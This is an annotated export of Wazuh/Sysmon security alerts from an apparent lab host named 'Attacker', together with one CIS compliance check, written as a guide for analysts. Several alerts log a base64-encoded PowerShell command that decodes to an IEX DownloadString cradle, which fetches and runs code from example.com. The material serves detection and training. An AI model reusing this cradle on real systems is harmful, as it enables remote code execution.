data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd5f-680a-740b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 16016 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 75 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534310.1636688 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:28.2206040Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284624 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:38:28.201
ProcessGuid: {94294ddc-bd62-680a-760b-000000000e00}
ProcessId: 16188
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_zwznofro.2cu.ps1
CreationUtcTime: 2025-04-24 22:38:28.201
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:28.201 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd62-680a-760b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16188 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_zwznofro.2cu.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:38:28.201 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 72 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534313.1639457 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:31.9272596Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284660 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:38:29.313
ProcessGuid: {94294ddc-bd65-680a-780b-000000000e00}
ProcessId: 16300
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd62-680a-760b-000000000e00}
ParentProcessId: 16188
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:29.313 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd65-680a-780b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16300 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd62-680a-760b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 16188 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 76 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534314.1647528 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:32.1436825Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284661 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:38:32.118
ProcessGuid: {94294ddc-bd65-680a-780b-000000000e00}
ProcessId: 16300
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_5fxg3jxr.0j5.ps1
CreationUtcTime: 2025-04-24 22:38:32.118
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:32.118 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd65-680a-780b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16300 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_5fxg3jxr.0j5.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:38:32.118 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit File Share' is set to 'Success and Failure'.: Status changed from failed to 'not applicable'
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit File Share' is set to 'Success and Failure'.: Status changed from failed to 'not applicable'
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit File Share' is set to 'Success and Failure'.: Status changed from failed to 'not applicable' Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19013 Numeric ID of the detection rule that fired.
rule.firedtimes: 4 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['17.6.2'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['3.3', '8.5'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534315.1650297 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 2137254061 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26158 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Audit File Share' is set to 'Success and Failure'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting allows you to audit attempts to access a shared folder. The recommended state for this setting is: Success and Failure. Note: There are no system access control lists (SACLs) for shared folders. If this policy setting is enabled, access to all shared folders on the system is audited. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: In an enterprise managed environment, workstations should have limited file sharing activity, as file servers would normally handle the overall burden of file sharing activities. Any unusual file sharing activity on workstations may therefore be useful in an investigation of potentially malicious activity. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Success and Failure: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Object Access\Audit File Share Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 17.6.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 3.3,8.5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.command: ['auditpol.exe /get /subcategory:"File Share"'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: not applicable PASS or FAIL. Red = needs fixing.
data.sca.check.reason: Timeout overtaken running command 'auditpol.exe /get /subcategory:"File Share"' No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.previous_result: failed Last run’s pass/fail – trend spotting for drift.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 73 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534317.1653536 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:34.7701903Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284685 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:38:33.507
ProcessGuid: {94294ddc-bd69-680a-7b0b-000000000e00}
ProcessId: 7408
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd65-680a-780b-000000000e00}
ParentProcessId: 16300
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:33.507 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd69-680a-7b0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 7408 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
